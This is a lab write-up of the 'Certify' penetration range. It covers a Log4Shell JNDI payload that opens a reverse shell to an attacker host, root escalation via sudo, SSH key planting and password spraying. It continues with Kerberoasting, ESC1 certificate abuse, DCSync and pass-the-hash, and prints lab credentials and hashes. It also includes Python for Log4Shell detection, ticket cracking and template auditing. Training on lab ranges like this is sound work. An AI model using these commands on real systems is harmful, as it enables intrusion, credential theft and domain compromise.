Spring and Autumn Cloud Mirror (春秋云镜) - Certify - Writeup


Target introduction:
Certify is a medium-difficulty range. Completing it helps players understand proxy forwarding, intranet scanning, information gathering, privilege escalation and lateral movement in intranet penetration, strengthens their understanding of the domain's core authentication mechanism, and covers some interesting techniques in domain penetration. There are 4 flags in the range, spread across different hosts.

Start the range; the assigned entry IP is:

39.xx.xx.xxx

Scanning the entry host (fscan output below) finds a Solr admin panel on port 8983:

icmp alive hosts len is: 1
39.xx.xx.xxx:22 open
39.xx.xx.xxx:8983 open
39.xx.xx.xxx:80 open
alive ports len is: 3
start vulscan
[*] WebTitle:http://39.xx.xx.xxx      code:200 len:17     title:Welcome to nginx!
[*] WebTitle:http://39.xx.xx.xxx:8983 code:302 len:0      title:None
[*] WebTitle:http://39.xx.xx.xxx:8983/solr/ code:200 len:10     title:Solr Admin

Apache Solr 5.0.0 to 8.3.1 has a Velocity-template RCE (CVE-2019-17558).
After trying it, I found that the target is not vulnerable to it.
After some twists and turns, I found that Log4j (Log4Shell, CVE-2021-44228) can also be used.

The JNDI injection goes through the controllable action parameter of the Collections API, whose value Solr writes to its log through Log4j 2; the path is

/solr/admin/collections?action=xxxxx

Testing with a DNSLog domain, the callback arrives, which confirms that the lookup is evaluated:

http://39.xx.xx.xx:8983/solr/admin/collections?action=${jndi:ldap://dnslog.wnc78i.dnslog.cn}


So I moved on to getting a reverse shell.
The original project is gone;
I used the copy re-uploaded by other researchers:
https://github.com/black9/Log4shell_JNDIExploit.git

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 175.xx.xx.xx -p 8888
/solr/admin/collections?action=${jndi:ldap://175.xx.xx.xx:1389/Basic/ReverseShell/175.xx.xx.xx/9999}

The listener on port 9999 receives the reverse shell.
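As an added example for this writeup (not code from the post or from JNDIExploit), here is the detection side of the step above: a normaliser that undoes the nested-lookup and URL-encoding tricks used to hide the literal ${jndi: in the Collections API request, run over constructed nginx-style access-log lines for the Solr path. The log lines, client addresses and the 203.0.113.7 callback host are made up for the demo.

```python
"""Flag Log4Shell (CVE-2021-44228) lookups in web access logs.

Added example for this writeup; not code from the post or from JNDIExploit.
Log4j resolves nested ${...} lookups before the JNDI lookup runs, so a
detector has to do the same before searching for "jndi:".
"""
import re
from urllib.parse import unquote

# An innermost ${...}: no nested "${" or "}" between the braces.
_INNER = re.compile(r"\$\{([^${}]*)\}")


def _resolve(body: str) -> str:
    """Evaluate one lookup the way the vulnerable resolver would."""
    if body.startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:            # ${env:NOPE:-j} / ${::-j}: the default value wins
        return body.rsplit(":-", 1)[1]
    return body                 # unknown lookup (e.g. jndi:...): keep text for matching


def normalise(request: str) -> str:
    """Percent-decode (twice, for double encoding) and collapse nested lookups."""
    s = unquote(unquote(request))
    for _ in range(32):         # bounded so malformed input cannot spin forever
        collapsed = _INNER.sub(lambda m: _resolve(m.group(1)), s)
        if collapsed == s:
            break
        s = collapsed
    return s


def is_log4shell(request: str) -> bool:
    return "jndi:" in normalise(request).lower()


def scan_log(lines):
    """Return (line number, normalised line) for every suspicious entry."""
    return [(n, normalise(line)) for n, line in enumerate(lines, 1) if is_log4shell(line)]


# Constructed nginx-style access-log lines for the Solr path used in the writeup.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Jul/2023:10:01:02 +0800] "GET /solr/admin/collections?action=LIST HTTP/1.1" 200 512',
    '10.0.0.9 - - [12/Jul/2023:10:01:09 +0800] "GET /solr/admin/collections?action=${jndi:ldap://203.0.113.7:1389/a} HTTP/1.1" 500 0',
    '10.0.0.9 - - [12/Jul/2023:10:01:11 +0800] "GET /solr/admin/collections?action=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F203.0.113.7%3A1389%2Fa%7D HTTP/1.1" 500 0',
    '10.0.0.9 - - [12/Jul/2023:10:01:15 +0800] "GET /solr/admin/collections?action=${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.7:1389/a} HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for n, text in scan_log(SAMPLE_LOG):
        print(f"line {n}: {text}")
```

A plain grep for "${jndi:" catches only the second sample line; the third and fourth are the obfuscations that were actually seen in the wild, and they only become visible after the lookups are collapsed the way Log4j itself collapses them.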

sudo -l shows that grc can be run as root with NOPASSWD. grc's --pty option runs the given command inside a pseudo-terminal, so handing it an interactive bash (the GTFOBins sudo entry for grc):

sudo grc --pty /bin/bash -i

gives a root shell.

flag01.txt can then be read:

flag01: flag{366d6ba1-71fd-4b1a-94ad-5df60eb7433a}

netstat -ntpl shows that sshd is listening on the target,
so we can add our own public key for SSH access without changing any password.

Generate an RSA key pair on the attacker machine:

ssh-keygen -t rsa

Then append the generated id_rsa.pub to the target's .ssh directory as authorized_keys (the directory must be mode 700 and the file mode 600, otherwise sshd ignores the key):

echo 'ssh-rsa <public key> ubuntu@VM-20-4-ubuntu' >> ~/.ssh/authorized_keys

Login succeeds.

There are many ways to upload the frp client and fscan; see other articles on my blog.
Once the proxy is established through frp, use Proxifier to route the tools through it.

The fscan results are as follows:
start infoscan
(icmp) Target 172.22.9.19     is alive
(icmp) Target 172.22.9.7      is alive
(icmp) Target 172.22.9.13     is alive
(icmp) Target 172.22.9.26     is alive
(icmp) Target 172.22.9.47     is alive
[*] Icmp alive hosts len is: 5
172.22.9.47:21 open
172.22.9.19:22 open
172.22.9.19:8983 open
172.22.9.26:80 open
172.22.9.47:80 open
172.22.9.47:22 open
172.22.9.19:80 open
172.22.9.7:88 open
172.22.9.13:445 open
172.22.9.26:445 open
172.22.9.47:445 open
172.22.9.7:445 open
172.22.9.26:139 open
172.22.9.13:139 open
172.22.9.7:139 open
172.22.9.26:135 open
172.22.9.13:135 open
172.22.9.7:135 open
172.22.9.47:139 open
[*] alive ports len is: 19
start vulscan
[*] WebTitle:http://172.22.9.19        code:200 len:612    title:Welcome to nginx!
[+] NetInfo:
[*]172.22.9.7
   [->]XIAORANG-DC
   [->]172.22.9.7
[+] NetInfo:
[*]172.22.9.26
   [->]DESKTOP-CBKTVMO
   [->]172.22.9.26
[+] NetInfo:
[*]172.22.9.13
   [->]CA01
   [->]172.22.9.13
[*] WebTitle:http://172.22.9.47        code:200 len:10918  title:Apache2 Ubuntu Default Page: It works
[*] 172.22.9.13          XIAORANG\CA01
[*] 172.22.9.7     [+]DC XIAORANG\XIAORANG-DC
[*] 172.22.9.26          XIAORANG\DESKTOP-CBKTVMO
[*] 172.22.9.47          WORKGROUP\FILESERVER        Windows 6.1
[*] 172.22.9.47  (Windows 6.1)
[*] WebTitle:http://172.22.9.19:8983   code:302 len:0      title:None redirect url: http://172.22.9.19:8983/solr/
[*] WebTitle:http://172.22.9.26        code:200 len:703    title:IIS Windows Server
[*] WebTitle:http://172.22.9.19:8983/solr/ code:200 len:16555  title:Solr Admin

At first glance there seems to be nothing to exploit. Viewing the web services through the proxy shows only the default nginx and Apache pages.
Use smbclient to list the shares on the file server that can be accessed anonymously (press Enter at the password prompt for a null session):

smbclient -L //172.22.9.47/

smbclient  //172.22.9.47/fileserver

Download all the files inside. One of them holds flag02:

 ________  _______   ________  _________  ___  ________ ___    ___ 
|\   ____\|\  ___ \ |\   __  \|\___   ___\\  \|\  _____\\  \  /  /|
\ \  \___|\ \   __/|\ \  \|\  \|___ \  \_\ \  \ \  \__/\ \  \/  / /
 \ \  \    \ \  \_|/_\ \   _  _\   \ \  \ \ \  \ \   __\\ \    / / 
  \ \  \____\ \  \_|\ \ \  \\  \|   \ \  \ \ \  \ \  \_| \/  /  /  
   \ \_______\ \_______\ \__\\ _\    \ \__\ \ \__\ \__\__/  / /    
    \|_______|\|_______|\|__|\|__|    \|__|  \|__|\|__|\___/ /     
                                                      \|___|/      

flag02: flag{efaa6dd8-3e17-4122-a768-2f077d34fb54}

Yes, you have enumerated smb. But do you know what an SPN is?

The share also contains a SQLite database.
Opening it with Navicat shows some names,

and some passwords.

Combining these with the hint above, build user and password lists from them
and spray them to find a few valid accounts:

 hydra -L user.txt -P pass 172.22.9.26 rdp  


Two hits:

login: zhangjian password: i9XDE02pLVf
login: liupeng password: fiAzGwEMgTY

Request service tickets for the accounts that have SPNs (Kerberoasting) using the zhangjian credentials:

impacket-GetUserSPNs -dc-ip 172.22.9.7  xiaorang.lab/zhangjian:i9XDE02pLVf -request

The default output is in hashcat's krb5tgs format and can be cracked with mode 13100 (run once without --show to do the cracking; --show only prints results already in the potfile; on Kali the wordlist lives under /usr/share/wordlists/):

hashcat hashc.txt  -m 13100  /usr/share/wordlist/rockyou.txt --show


Cracked passwords:

chenchen  @Passw0rd@
zhangxia MyPass2@@6
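As an added example for this writeup (not code from the post, impacket or hashcat), this is what mode 13100 actually does with a $krb5tgs$23$ line: derive the RC4-HMAC key (the NT hash) from each candidate password, decrypt the ticket and verify its HMAC-MD5 checksum. MD4 is implemented inline because hashlib's md4 is usually disabled. The real tickets from the range are not in the post, so the sample ticket is constructed here with the same routine and an invented SPN and ticket body.

```python
"""Kerberoast cracking, the way hashcat -m 13100 treats a $krb5tgs$23$ line:
derive the RC4-HMAC (etype 23) key from each candidate password, decrypt the
ticket and verify its HMAC-MD5 checksum (RFC 4757).

Added example for this writeup; not code from the post, impacket or hashcat.
MD4 is implemented inline because hashlib's md4 is usually disabled.
The ticket below is constructed with the same routine; the SPN is invented.
"""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF
TICKET_USAGE = 2   # RFC 4120 key usage for the TGS-REP ticket enc-part


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 (needed for the NT hash)."""
    def rot(x, n):
        x &= MASK
        return ((x << n) | (x >> (32 - n))) & MASK
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    r2 = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]
    r3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(16):
            a = rot(a + F(b, c, d) + X[i], (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):
            a = rot(a + G(b, c, d) + X[r2[i]] + 0x5A827999, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):
            a = rot(a + H(b, c, d) + X[r3[i]] + 0x6ED9EBA1, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        h = [(x + y) & MASK for x, y in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); it is also the RC4-HMAC Kerberos key."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    S, j = list(range(256)), 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()


def rc4_hmac_encrypt(key: bytes, plaintext: bytes, confounder: bytes) -> bytes:
    """RFC 4757 encrypt: checksum || RC4(K3, confounder || plaintext)."""
    k1 = hmac_md5(key, struct.pack("<I", TICKET_USAGE))
    data = confounder + plaintext
    checksum = hmac_md5(k1, data)            # K2 == K1 for non-export keys
    return checksum + rc4(hmac_md5(k1, checksum), data)


def to_hashcat(user: str, realm: str, spn: str, enc_part: bytes) -> str:
    """The line GetUserSPNs -request writes (hashcat mode 13100)."""
    return f"$krb5tgs$23$*{user}${realm}${spn}*${enc_part[:16].hex()}${enc_part[16:].hex()}"


def crack(line: str, wordlist):
    """Return the password whose key verifies the ticket checksum, else None."""
    assert line.startswith("$krb5tgs$23$"), "only etype 23 handled here"
    _, checksum_hex, edata_hex = line.rsplit("$", 2)
    checksum, edata = bytes.fromhex(checksum_hex), bytes.fromhex(edata_hex)
    for pw in wordlist:
        k1 = hmac_md5(nt_hash(pw), struct.pack("<I", TICKET_USAGE))
        plain = rc4(hmac_md5(k1, checksum), edata)
        if hmac.compare_digest(hmac_md5(k1, plain), checksum):
            return pw
    return None


# Constructed ticket for zhangxia (SPN and body invented; fixed confounder for repeatability).
SAMPLE_TICKET = to_hashcat(
    "zhangxia", "XIAORANG.LAB", "MSSQLSvc/demo.xiaorang.lab:1433",
    rc4_hmac_encrypt(nt_hash("MyPass2@@6"), b"\x63\x82\x01\x00constructed EncTicketPart", bytes(range(8))),
)


def demo():
    return crack(SAMPLE_TICKET, ["Password1", "rockyou", "MyPass2@@6", "@Passw0rd@"])


if __name__ == "__main__":
    print(SAMPLE_TICKET)
    print("cracked:", demo())
```

The whole cost of a guess is one MD4, three HMAC-MD5 and one RC4, which is why RC4 (etype 23) tickets crack so fast on a GPU and why service accounts should get AES-only keys and long random passwords (or be gMSAs).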

Logging in to 172.22.9.26 as zhangxia succeeds.

The PDF in the anonymous SMB share mentioned this technique:

Using Misconfigured Certificate Templates - ESC1 (certificate template misconfiguration) for intra-domain privilege escalation
Certify project: https://github.com/GhostPack/Certify

Find the vulnerable certificate templates:
Certify.exe find /vulnerable

Run Certify to request a certificate from the vulnerable template, passing the domain administrator as /altname (the template lets the enrollee supply the subject, which is what makes it ESC1):

Certify.exe request /ca:CA01.xiaorang.lab\xiaorang-CA01-CA /template:"XR Manager"  /altname:xiaorang\Administrator

Certificate requested. Certify prints the key and certificate in PEM form; convert them to a PFX with openssl, pressing Enter at the export password prompt to leave it empty:

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

This produces cert.pfx.
Then use Rubeus to request a TGT with the certificate (PKINIT) and inject it into the session (PTT).
Project address: https://github.com/GhostPack/Rubeus

The password can be empty:

Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /password: /ptt
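As an added example for this writeup (not Certify's code), the ESC1 decision that Certify.exe find /vulnerable makes, written out over template attributes: the same preconditions from SpecterOps' "Certified Pre-Owned" paper, plus the two fixes that each close the hole. The post shows only the template name "XR Manager", not its attribute values, so the template records are constructed; the second one is modelled on the stock User template.

```python
"""ESC1 check over certificate-template settings: the same preconditions
Certify's `find /vulnerable` evaluates (SpecterOps, "Certified Pre-Owned").

Added example for this writeup; not Certify's code. The template records
are constructed: the post shows only the template name "XR Manager", not
its attribute values, and the second template is modelled on the stock
User template.
"""
from copy import deepcopy

# msPKI-Certificate-Name-Flag bit
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# msPKI-Enrollment-Flag bit ("CA certificate manager approval")
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

# EKUs that let the certificate authenticate as its subject (PKINIT / Schannel)
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
LOW_PRIV_PRINCIPALS = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}


def esc1_conditions(tpl: dict) -> dict:
    """Evaluate each ESC1 precondition; the template is ESC1 only if all hold."""
    ekus = set(tpl["ekus"])
    enrollers = {p.split("\\")[-1] for p in tpl["enroll_principals"]}
    return {
        "published on a CA": tpl["enabled"],
        "low-privileged enrollment rights": bool(enrollers & LOW_PRIV_PRINCIPALS),
        "no manager approval": not (tpl["enrollment_flag"] & CT_FLAG_PEND_ALL_REQUESTS),
        "no authorized signatures required": tpl["ra_signatures"] == 0,
        "enrollee supplies subject (SAN)": bool(tpl["name_flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
        "authentication EKU (or none)": not ekus or bool(ekus & AUTH_EKUS),
    }


def is_esc1(tpl: dict) -> bool:
    return all(esc1_conditions(tpl).values())


def find_vulnerable(templates):
    """Names of the ESC1 templates, like Certify.exe find /vulnerable."""
    return [t["name"] for t in templates if is_esc1(t)]


def harden(tpl: dict) -> dict:
    """Two independent fixes: stop the enrollee choosing the subject, and require approval."""
    fixed = deepcopy(tpl)
    fixed["name_flag"] &= ~CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
    fixed["enrollment_flag"] |= CT_FLAG_PEND_ALL_REQUESTS
    return fixed


TEMPLATES = [
    {   # constructed to match what the writeup exploits with /altname
        "name": "XR Manager", "enabled": True,
        "name_flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
        "enrollment_flag": 0, "ra_signatures": 0,
        "ekus": ["1.3.6.1.5.5.7.3.2"],
        "enroll_principals": ["XIAORANG\\Domain Users"],
    },
    {   # modelled on the stock User template: subject built from AD, not supplied
        "name": "User", "enabled": True,
        "name_flag": 0xA6000000,
        "enrollment_flag": 0, "ra_signatures": 0,
        "ekus": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4", "1.3.6.1.4.1.311.10.3.4"],
        "enroll_principals": ["XIAORANG\\Domain Users"],
    },
    {   # same settings as XR Manager but only admins may enroll: not reachable by zhangxia
        "name": "XR Manager (admins only)", "enabled": True,
        "name_flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
        "enrollment_flag": 0, "ra_signatures": 0,
        "ekus": ["1.3.6.1.5.5.7.3.2"],
        "enroll_principals": ["XIAORANG\\Domain Admins"],
    },
]

if __name__ == "__main__":
    print("vulnerable:", find_vulnerable(TEMPLATES))
    for name, ok in esc1_conditions(TEMPLATES[0]).items():
        print(f"  {name}: {ok}")
```

The check is template-level only: it does not model the CA's own enrollment ACL, the EDITF_ATTRIBUTESUBJECTALTNAME2 CA flag (ESC6) or the other ESC cases, which a real audit also has to cover.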


With the administrator TGT in the session, use mimikatz DCSync to dump the domain administrator's hash from the DC:

mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /user:Administrator" exit

Then use wmiexec with the NT hash (pass-the-hash) against the remaining hosts, one command per host, to get the last two flags:

impacket-wmiexec  XIAORANG.LAB/Administrator@<target> -hashes :2f1b57eefb2d152196836b0516abea80

flag03: flag{990600da-05ce-40d8-b7b2-9230ab88bcd4}

impacket-wmiexec  XIAORANG.LAB/Administrator@<target> -hashes :2f1b57eefb2d152196836b0516abea80

flag04: flag{436cff95-95f9-408c-ad58-3be79709e2d4}

Origin: https://blog.csdn.net/qq_35607078/article/details/131689416